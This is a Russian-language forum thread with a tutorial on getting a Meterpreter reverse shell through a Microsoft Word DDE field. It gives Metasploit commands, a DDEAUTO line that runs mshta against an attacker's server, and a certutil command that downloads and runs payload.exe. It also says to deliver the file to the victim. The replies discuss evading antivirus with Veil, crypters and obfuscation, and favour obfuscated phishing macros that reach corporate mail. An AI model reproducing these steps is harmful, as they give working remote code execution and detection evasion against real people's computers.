Статья Meterpreter сессия через Microsoft Word

Добрый день.
В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE
Почерпнуть немного информации о том что это можно тут:
Ссылка скрыта от гостей


Информация предоставлена для ознакомления, используйте на свой страх и риск.

Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

Приступим:
Качаем пакет и копируем его в каталог metasploit
Код: 
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/

Запускаем metasploit и на всякий обновляем модули
msf > reload_all
msf > use exploit/windows/dde_delivery
Подгружаем полезную нагрузку
msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)
msf exploit(dde_delivery) > exploit

Вывод будет следующим:
2017-11-09_14-46-30.png

И нам нужны последние строки, которые мы и вставляем в ворд
У меня это
Код: 
DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"

Вот гифка куда и как нужно ето воткнуть

Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем
При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.
2017-11-09_15-31-31.png


2017-11-09_15-31-54.png


2017-11-09_15-32-14.png


После открытия файла прилетит заветная сессия meterpreter
2017-11-09_14-59-20.png


Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com
Ссылка скрыта от гостей


rkvTgVliH2mEFy4JLhANd1.png

Спасибо за внимание)
P.S. Первый раз пишу статью на форум, посему наверное немного сумбурная подача)

[doublepost=1510562006,1510226184][/doublepost]Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

Код: 
DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"
 

Вложения

  • 2017-11-09_14-27-31.png
    2017-11-09_14-27-31.png
    2,7 КБ · Просмотры: 1 089
  • 2017-11-09_14-31-48.png
    2017-11-09_14-31-48.png
    14,4 КБ · Просмотры: 416
  • 2017-11-09_14-33-55.png
    2017-11-09_14-33-55.png
    19,5 КБ · Просмотры: 354
  • 2017-11-09_14-46-30.png
    2017-11-09_14-46-30.png
    17 КБ · Просмотры: 336
  • 2017-11-09_14-59-20.png
    2017-11-09_14-59-20.png
    31,7 КБ · Просмотры: 370
  • 2017-11-09_15-31-31.png
    2017-11-09_15-31-31.png
    3,4 КБ · Просмотры: 455
  • 2017-11-09_15-31-54.png
    2017-11-09_15-31-54.png
    3,4 КБ · Просмотры: 321
  • 2017-11-09_15-32-14.png
    2017-11-09_15-32-14.png
    3,1 КБ · Просмотры: 337
Последнее редактирование:
  • Нравится
Реакции: m0r3 0v3r, explorer_traveler, id2746 и ещё 16
Нажмите, чтобы раскрыть...
A

adm2

Green Team
05.07.2017
50
120
BIT
0
OneDollar сказал(а):
Аваст и есет от жизни отстали..) Нихрена не видят :) Касперыч глазастый
Нажмите, чтобы раскрыть...
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f
Ссылка скрыта от гостей
&& payload"
То здесь даже шестой нод ничего не видит.
 
  • Нравится
Реакции: Kalina
O

OneDollar

adm2 сказал(а):
Любопытно что шестой есет потом всё таки нашёл подозрительную активность в файле, а вот пятый до сих пор слепой котёнок

Если использовать нагрузку, созданную через Veil (про собственные крипторы вообще молчу) и подгрузить её таким образом:
> DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f
Ссылка скрыта от гостей
&& payload"
То здесь даже шестой нод ничего не видит.
Нажмите, чтобы раскрыть...
А что на счет "собственные крипторы" может поделишься ?)
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
OneDollar сказал(а):
А что на счет "собственные крипторы" может поделишься ?)
Нажмите, чтобы раскрыть...
У меня их пока нет, на этой тропе я всего полгода, после того как чуть не поразил WannaCry (спасло то что ПК не смотрели напрямую в инет)
Посему пришлось окунуться в область информационной безопасности поглубже дабы знать где, как, через что, откуда и каким образом может проникнуть какой-нибудь зловред)
 
H

Hackaton192

Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь!
 
  • Нравится
Реакции: Underwood
J

JoeBlack0001

Тут можно смело втыкать рекламу криптора =))
 
U

Underwood

Hackaton192 сказал(а):
Есть методы хорошей обфускации DDE-шек, тут на форуме была про них статья! с помощью функции QUOTE, гугл всем в помощь
Нажмите, чтобы раскрыть...
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
 
  • Нравится
Реакции: Vertigo и Сергей Попов
O

OneDollar

Underwood сказал(а):
Статью можно почитать по ссылке. Кстати, в версиях MSWord не позднее 2007, можно также использовать frames и framesets, которые используются для загрузки произвольного html кода с любой веб-страницы в поле frame документа.
Нажмите, чтобы раскрыть...
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
Ссылка скрыта от гостей
 
  • Нравится
Реакции: Vertigo и Underwood
H

Hackaton192

OneDollar сказал(а):
Вчера через юникорн создал файл, чекается 10тью антивирусами. Из топовых только касперский. Позор есет и авасту) Может я как-то натупил, но вряд ли. Смотрите:
Ссылка скрыта от гостей
Нажмите, чтобы раскрыть...

Думаю все кто в теме давно уже юзают данный инструмент, всем пожалуйста:
https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

На мой взгляд тема с DDE, уступает тем же макросам, так как ПЕРВОЕ уж очень много раз приходится нажать на OK. А ВТОРОЕ с точки соц.инженерии жертва не видит документа и ее сложно заинтересовать(только лишь названием документа получается и то,что в теле письма,если мы рассылаем через e-mail), поэтому я юзаю хорошо обфусцированные макросы(пусть они на известные почтовые сервисы доходят хуже, но на корпоративные почтовики залетают как-надо)
 
  • Нравится
Реакции: Vertigo, Ondrik8, Underwood и ещё 3
shooter

shooter

Green Team
25.10.2016
184
146
BIT
0
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
 
A

adm2

Green Team
05.07.2017
50
120
BIT
0
Sniff сказал(а):
Здорово, надо было на конкурс !
Нажмите, чтобы раскрыть...
Какой конкурс =) самое обычное описание стандартного, в скором времени, описания эксплоита)
Вот когда найдёт просвещение, тогда да)
krylovlf сказал(а):
За статью спасибо! но было бы интереснее узнать что нибудь про CVE-2017-11882
Нажмите, чтобы раскрыть...
С момента комментария вышло две статьи на данную CVE
CVE-2017-11882 или Взлом с помощью безобидного документа
CVE-2017-11882 MS Word Metasploit
 
  • Нравится
Реакции: Сергей Попов
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ